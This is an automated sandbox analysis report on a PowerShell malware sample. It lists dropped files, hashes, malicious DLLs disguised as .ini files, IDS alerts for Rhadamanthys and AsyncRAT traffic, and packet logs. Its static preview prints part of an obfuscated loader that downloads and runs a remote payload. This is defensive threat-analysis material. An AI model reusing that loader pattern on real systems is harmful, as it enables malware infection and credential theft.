                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hfinaoj.cmb.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bi5apl12.bus.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0rpsldo.xy0.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odght2dz.fko.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rmehz2qx.pdv.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0z2xbau.5dc.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2o35p3n.u3c.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbeuk0i1.rlf.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\second_data_temp.zip

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94081
                                                                                                    Entropy (8bit):7.867349334322687
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:6JlEt2c1bx3Wv8FFdY38bjlMyrr1D2iri2KQjHhIvwwwXNjsbdCnhBqCMEgAVvDG:QlsvdYMP1r8QjB99ICniZsG
                                                                                                    MD5:33725DFCC8FFCBC026839DA2BDB55DAE
                                                                                                    SHA1:35F249AD0850B4EDBC62AF40DE427EF2BDD99C78
                                                                                                    SHA-256:0DE6B62B625EA86A56117A1EDCEFF37DFA1D2492BB62993BAAF9C59FBE1FF789
                                                                                                    SHA-512:9D663C570DF995BB8402AE5A8236A47EE2581439CFF6F53FB0FCC84A1960D448963DA94F9FA91849DD10020DC08FF8A3096420DE57BC6653722480180807D4B6
                                                                                                    Malicious:false
                                                                                                    Preview:PK..........AY...@.n..........second_data.bin.\y\.....,.n.$..9$*.Ri...$."G.\.,..P.TB.&.F.)R....I.fE..}..s...{....g...Z.Z{.7..,..E..o.{iF".YO.dTE.D.'..04"%.....0N.x`.C......1..&.Q.r...}..zW<=D.*m ..'.[.L.@...r..A...*Kn...X.J+7....,..../....4.........n.`04V.Y.......q...............PJUT.'>..]....~.og........%.....F..!.....8..|.5....".....-.............%.1....?2 ...A.[k..........5E-.U{io...`|..H..;..?<....!..Z.?.1rs5".X...d.T.86|K#..G<K.i.d.Y4....S>-a...2W..8...{.L.C....... .s..H......_.}n(..}oz?.c...Z.l...9Rb...Hs.........Rt.W.._y+f9O......m./.......Cg....kq.&[..N.e./.[.~...qYx........O.I.\Q...U..k.f.].c...N..r.......O.ARv......^j..Z...._v...z9.b..X.AVv.....k|....7g....>g....7&B\.r.........E.UB.6C~Y.[z.:.B0.[S.....g--.p_..3......=.........[.....{.IFU.7>=.'#......S...v..>...,..b.i..0#w.F...E.....d...^........^...n.....\.....mk..S.!_..0.uc...Z........s.v.....I..r....2.b...PW....t...v...=Z`.f..x...'._.{..wu....L._.t....w.....x...~....$K(R....J..

                                                                                                    C:\Users\user\AppData\Roaming\4smg.ini

                                                                                                    Download File
                                                                                                    Process:C:\Users\Public\ajbs50ul.bat
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1069056
                                                                                                    Entropy (8bit):7.687858240798343
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:J80IV0b83n9cPUhWDn3nyjAhosTiwTJ80qIa07x72:a0DbeGU0iTsTi30q+7x72
                                                                                                    MD5:60A55B1D8E739216CADD3E31D7412F03
                                                                                                    SHA1:8B5C284796A1EFA1DF8A3EDDD27070D374E1CC54
                                                                                                    SHA-256:BE86E0357748F3B4FA166342F284800A83C955C2C8B197475C2450613A6EED67
                                                                                                    SHA-512:C06CB2B86F7A9DE5243F4395FB40FA88A7669F3E427D427AFB95801DE447BEB8F616847890AE12CFC6060EC7215CEB370CD61B5CF0395EAB81312121060DC7AB
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: 81zBpBAWwc.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...O-.f..........."...*.....L......0....................................................`... ......................................p..........................................|...............................(...................X................................text...X...........................`..`.data...............................@....rdata.. ...........................@..@.pdata..............................@..@.xdata...2... ...4..................@..@.bss....@....`...........................edata.......p.......2..............@..@.idata...............4..............@....CRT....`............F..............@....tls.................H..............@....reloc..|............J..............@..B........................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6225
                                                                                                    Entropy (8bit):3.7372500656562364
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:fu2rLrACoU20oXukvhkvklCywJfsbMIl6jSogZo4JJJa/sbMIlljSogZo4JJJO1:LrvAChr5kvhkvCCthsbMITHKsbMIGHK
                                                                                                    MD5:33C17F55823051886CC06CA104B52558
                                                                                                    SHA1:AC8671D6FA348E22E0E5E07217B893AEC0BE6416
                                                                                                    SHA-256:FAB39391399B43C676F4F81975E8226C01586C3FB25FBD2D29EC6A71AA4FC9CF
                                                                                                    SHA-512:F1680C2912B6A0DD3BE2E2610979B62D451B1067FCC6CDD42D4DE63240B5111449FD980A39A04F35721F7452A2CF5F4627AAFF9C282C82868EE55C5162A928FE
                                                                                                    Malicious:false
                                                                                                    Preview:...................................FL..................F.".. .....*_...%*......z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....e......W...........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=HYe...........................3*N.A.p.p.D.a.t.a...B.V.1.....HYd...Roaming.@......EW.=HYd...........................c.!.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=HY`...............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=HY`.............................].W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=HY`.....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=HY`.....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=HYi.....9...........

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W72MS75UTRADULZQLMHG.temp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6225
                                                                                                    Entropy (8bit):3.7372500656562364
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:fu2rLrACoU20oXukvhkvklCywJfsbMIl6jSogZo4JJJa/sbMIlljSogZo4JJJO1:LrvAChr5kvhkvCCthsbMITHKsbMIGHK
                                                                                                    MD5:33C17F55823051886CC06CA104B52558
                                                                                                    SHA1:AC8671D6FA348E22E0E5E07217B893AEC0BE6416
                                                                                                    SHA-256:FAB39391399B43C676F4F81975E8226C01586C3FB25FBD2D29EC6A71AA4FC9CF
                                                                                                    SHA-512:F1680C2912B6A0DD3BE2E2610979B62D451B1067FCC6CDD42D4DE63240B5111449FD980A39A04F35721F7452A2CF5F4627AAFF9C282C82868EE55C5162A928FE
                                                                                                    Malicious:false
                                                                                                    Preview:...................................FL..................F.".. .....*_...%*......z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....e......W...........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=HYe...........................3*N.A.p.p.D.a.t.a...B.V.1.....HYd...Roaming.@......EW.=HYd...........................c.!.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=HY`...............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=HY`.............................].W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=HY`.....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=HY`.....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=HYi.....9...........

                                                                                                    C:\Users\user\AppData\Roaming\Tox\tox_save.tox

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\utox_x86_x64.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1485
                                                                                                    Entropy (8bit):5.29886005152047
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:EvaQDsIOJ7pb+sIO8k7pksIO8k7pBDqLMmCk7pisIEAf31Wf/HX:2xO596O8s2O8s7wCsYOf/3
                                                                                                    MD5:FF6F2D944FCD3934D660878D5A573F45
                                                                                                    SHA1:E068C9BA0D544A6FD210DD9C59FDCB3D92F9E170
                                                                                                    SHA-256:766A1D5F4A0F1B8EB193E352F5D15EB9B1AFDD53CAC110530DC0C6A715DE73BF
                                                                                                    SHA-512:15A8BAB57CAFD8D38C9335401EA7DF55D157578CFADB73B23E9ADAF654A7E6B3B1768FBAD7B6CE2FB0F12C1CC78F828EF0FF7429EDB51B99D7C88EF9577927F6
                                                                                                    Malicious:false
                                                                                                    Preview:........D.......Y...._..p.......7....%..dIJ.l..q..oD.....ED.?......d..{.=..w.=\..........Y..................5z...I.-..d...<.=.c............i....}.>..............o..............,..0..7m.:.h...a6@6:N.zN............V:........D8...7.&_....Jn3..NtC.z.2...I.........5z...I.-..d...<.=.c............i....}.>...............V:........D8...7.&_....Jn3..NtC.z.2...I...........o..............,..0..7m.:.h...a6@6:N.zN.........5z...I.-..d...<.=.c............i....}.>...............V:........D8...7.&_....Jn3..NtC.z.2...I...........o..............,..0..7m.:.h...a6@6:N.zN................uTox User .......Toxing on uTox, from the future!.................t...................V:........D8...7.&_....Jn3..NtC.z.2...I...........o..............,..0..7m.:.h...a6@6:N.zN..........x...uJ....-f.y...$'....4v.-K.]..n.]..Qv.........5z...I.-..d...<.=.c............i....}.>....*.............T*.l..._*GQ..Y.......^.C..r..;.j.l,...n...F..wn..e_..G}....$.....<..;d.....m..<...@...#H..O.f.U.67..)=..Q.C+.h.z.....n...P

                                                                                                    C:\Users\user\AppData\Roaming\Tox\utox_save.ini

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\utox_x86_x64.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27
                                                                                                    Entropy (8bit):3.9400726873486547
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:VcM6RQRov:VcM6Ky
                                                                                                    MD5:5B4E46B79998EE26C8F854677A591421
                                                                                                    SHA1:7A6F479B28D7AB6E28582AF0AEE03FF2E923D57F
                                                                                                    SHA-256:F3780570DA34038FFD91A135C23D0EF83EE1F4368E7E5088C4D8B44B87BD8E8A
                                                                                                    SHA-512:211EAF9EB13C461961AD0538B26452160814D08789C3D6CDD879EF74D0DB374C3D9F55B85D0EFB89C841778BDD269E1E3496F91DC0CF77205C7C030A4E8C754C
                                                                                                    Malicious:false
                                                                                                    Preview:[general]..save_version=4..

                                                                                                    C:\Users\user\AppData\Roaming\Tox\utox_save.in~

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\utox_x86_x64.exe
                                                                                                    File Type:Generic INItialization configuration [interface]
                                                                                                    Category:dropped
                                                                                                    Size (bytes):708
                                                                                                    Entropy (8bit):4.648717284766249
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:VGK+WHTshKsaRVmfq/tOE8JfnIYuv8jy+SthXiJX7rAQtJhiq+auyYVS0v9:VGK+WHMKsaRVmf0EbnIYu02WtHDfAVS8
                                                                                                    MD5:4936FFCD5B5217817FACFA40DD6BF3C3
                                                                                                    SHA1:6F340BF744570CEF6537BD0A7E93DCC32F90D80E
                                                                                                    SHA-256:1BFB54EA4231FA9922F3F33581D05924131788F8556938C77842B6C21BC7FECD
                                                                                                    SHA-512:1A04A33846641ED3C8F4D0FE1FC0AD26FEB9A55D229D202E69CCE97FA09FC14AB00D810C3A80F3A50D7FB255698005A5883F115727207BD4BAF81C80A2DFB3FD
                                                                                                    Malicious:false
                                                                                                    Preview:[general]..save_version=4..utox_last_version=4609..[interface]..language=0..window_x=0..window_y=0..window_width=750..window_height=500..theme=0..scale=10..logging_enabled=true..close_to_tray=false..start_in_tray=false..auto_startup=false..use_mini_flist=false..filter=false..magic_flist_enabled=false..use_long_time_msg=true..[av]..push_to_talk=false..audio_filtering_enabled=true..audio_device_in=0..audio_device_out=0..video_fps=25..[notifications]..audible_notifications_enabled=true..status_notifications=true..no_typing_notifications=true..group_notifications=2..[advanced]..enableipv6=true..disableudp=false..proxyenable=false..proxy_port=0..proxy_ip=..force_proxy=false..block_friend_requests=false..

                                                                                                    C:\Users\user\AppData\Roaming\oSyU.ini

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\rekeywiz.exe
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):486400
                                                                                                    Entropy (8bit):6.904893954535027
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:gxOiJ9Cfi+tWW6AKEFR3hdf0GDm5iQ0d6ghn0N97tAD/IO9qckqHDUIKMB3emqqz:gxOiqfRD6kOb6node/B9U1MBOmqqra
                                                                                                    MD5:5BF9C5C649E1AF61B41EBCDFCA9597BC
                                                                                                    SHA1:8F83FFE801801567DA2933A3033F3D2AE0059AD3
                                                                                                    SHA-256:55A451457DBC1F6D28A4C1AB2D477FBBFAE002999A0789C9F3D1BD6610511D98
                                                                                                    SHA-512:32E7CF427EBA9E903D77B59F7299864149C6DD4B19FE59CE3C1E3144DB171E3C003CA06EA0E8B3B5CAF3E4DA4559F748760B6CB0256D063140797C32AADCD029
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 46%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: 81zBpBAWwc.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E..f..........."...*.....h......0................................................l....`... .................................................................................|...............................(...................X................................text...X...........................`..`.data...............................@....rdata..............................@..@.pdata..............................@..@.xdata...2...0...4..................@..@.bss....@....p...........................edata...............N..............@..@.idata...............P..............@....CRT....`............b..............@....tls.................d..............@....reloc..|............f..............@..B........................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\utox_x86_x64.exe

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4971787
                                                                                                    Entropy (8bit):6.423642262672567
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:98304:uVS4lyfvsVqltyD5DhADNlXQ2orLmKeLDCVvANLA1pOuI8F7fqLmLhPR6x7:vkPD52
                                                                                                    MD5:E9679980AA73CFC7CF00F3DA7949C661
                                                                                                    SHA1:53BA9E3A3A10AE0E72DF4B3632D8D4135EB540B6
                                                                                                    SHA-256:D7BD224B2EF0014C679046C917BECFFACE5F5ABA2FBDB7DD3C17FE964C3CEE97
                                                                                                    SHA-512:002AAC023E1BBE3BBBF153EBC5462970AA98C84BADEA6BC1B8D333C98A5ED91540928B8848A9928607E12C0A1296A12424B2C2B0753E23AFEB537249F04DB8BC
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: path.ps1, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d... _.`..A.f^....&...."..)..64...............@...............................W.....;uL....... ......................................PI......pI..3....I......p1...............J............................. c0.(....................|I..............................text.....).......).................`.P`.data...`.....).......).............@.p..rdata..p....p*......d*.............@.p@.rodata......`1......P1.............@.P@.pdata.......p1......^1.............@.0@.xdata.......P2......22.............@.0@.bss.........P3.......................p..edata.......PI......&3.............@.0@.idata...3...pI..4...:3.............@.0..CRT..........I......n3.............@.@..tls..........I......p3.............@.@..rsrc.........I......r3.............@.0..reloc........J......$4.............@.0B/4......P.....J......<4.............@.PB/19...........J......N4.............@..B/31.....

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:ASCII text, with very long lines (702), with no line terminators
                                                                                                    Entropy (8bit):5.458498097913523
                                                                                                    TrID:
                                                                                                      File name:test.ps1
                                                                                                      File size:702 bytes
                                                                                                      MD5:b629e4a76638f91a67059188d07e27f6
                                                                                                      SHA1:42b37211578e971c684b493c8b604874518652e3
                                                                                                      SHA256:b4dabf844bceeb5b1fa448549735296b4bdf289f346f960228d52a7a09e35ea1
                                                                                                      SHA512:e11cd5638890756787640c60cd6beaa8a61a6998d1077010da6f0b5f32bd67e176b09d984948cabd68ae2fa6fd9408a44360f0911d93fa205b7821af43b5784c
                                                                                                      SSDEEP:12:WWfk4AFHWEj5mdVFeLLPfI4SeRQoD/4EIlQUZ9GQuOWgTThUlIeRQqpO/dXyG:v+JWI5AILPfPSvoD/JsBjVuOWAa6J/dd
                                                                                                      TLSH:700110C56C56AFE31040E1D228C8BA7E3232D56D44F90192B5FA6263246D57D0DD7939
                                                                                                      File Content Preview:$flol=iex($('[Environment]::GetEh1zt'''.Replace('h1z','nvironmentVariable(''public'') + ''\\ajbs50ul.ba')));function getit([string]$fz, [string]$oulv){$ff=iex($('(Nwxwlw-Objwxwlct Systwxwlm.Nwxwlt.WwxwlbCliwxwlnt).Downgdvie($oulv.Replace(''v7i9'',''tps://

                                                                                                      File Icon

                                                                                                      Icon Hash:3270d6baae77db44

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-10-08T20:51:38.369878+02002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1147.45.126.713752192.168.2.749819TCP
                                                                                                      2024-10-08T20:51:48.271866+02002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1147.45.126.713752192.168.2.752140TCP
                                                                                                      2024-10-08T20:51:48.271866+02002854824ETPRO JA3 HASH Suspected Malware Related Response2147.45.126.713752192.168.2.752140TCP
                                                                                                      2024-10-08T20:51:58.223869+02002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1147.45.126.713752192.168.2.752206TCP
                                                                                                      2024-10-08T20:51:58.223869+02002854824ETPRO JA3 HASH Suspected Malware Related Response2147.45.126.713752192.168.2.752206TCP
                                                                                                      2024-10-08T20:52:04.514007+02002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert146.29.238.964872192.168.2.752242TCP
                                                                                                      2024-10-08T20:52:24.637017+02002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)1185.196.9.1747777192.168.2.752249TCP
                                                                                                      2024-10-08T20:53:24.866553+02002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert146.29.238.964872192.168.2.756563TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 8, 2024 20:51:09.613492966 CEST49674443192.168.2.7104.98.116.138
                                                                                                      Oct 8, 2024 20:51:09.613519907 CEST49675443192.168.2.7104.98.116.138
                                                                                                      Oct 8, 2024 20:51:09.910415888 CEST49672443192.168.2.7104.98.116.138
                                                                                                      Oct 8, 2024 20:51:10.193062067 CEST49677443192.168.2.720.50.201.200
                                                                                                      Oct 8, 2024 20:51:10.566946030 CEST49677443192.168.2.720.50.201.200
                                                                                                      Oct 8, 2024 20:51:11.019742012 CEST49671443192.168.2.7204.79.197.203
                                                                                                      Oct 8, 2024 20:51:11.316535950 CEST49677443192.168.2.720.50.201.200
                                                                                                      Oct 8, 2024 20:51:12.816685915 CEST49677443192.168.2.720.50.201.200
                                                                                                      Oct 8, 2024 20:51:15.800936937 CEST49677443192.168.2.720.50.201.200
                                                                                                      Oct 8, 2024 20:51:19.015276909 CEST49705443192.168.2.713.107.246.60
                                                                                                      Oct 8, 2024 20:51:19.015347004 CEST4434970513.107.246.60192.168.2.7
                                                                                                      Oct 8, 2024 20:51:19.015459061 CEST49705443192.168.2.713.107.246.60
                                                                                                      Oct 8, 2024 20:51:19.015933990 CEST49705443192.168.2.713.107.246.60
                                                                                                      Oct 8, 2024 20:51:19.015958071 CEST4434970513.107.246.60192.168.2.7
                                                                                                      Oct 8, 2024 20:51:19.222853899 CEST49675443192.168.2.7104.98.116.138
                                                                                                      Oct 8, 2024 20:51:19.222886086 CEST49674443192.168.2.7104.98.116.138
                                                                                                      Oct 8, 2024 20:51:19.519740105 CEST49672443192.168.2.7104.98.116.138
                                                                                                      Oct 8, 2024 20:51:19.660321951 CEST4434970513.107.246.60192.168.2.7
                                                                                                      Oct 8, 2024 20:51:19.660454035 CEST49705443192.168.2.713.107.246.60
                                                                                                      Oct 8, 2024 20:51:19.663897991 CEST49705443192.168.2.713.107.246.60
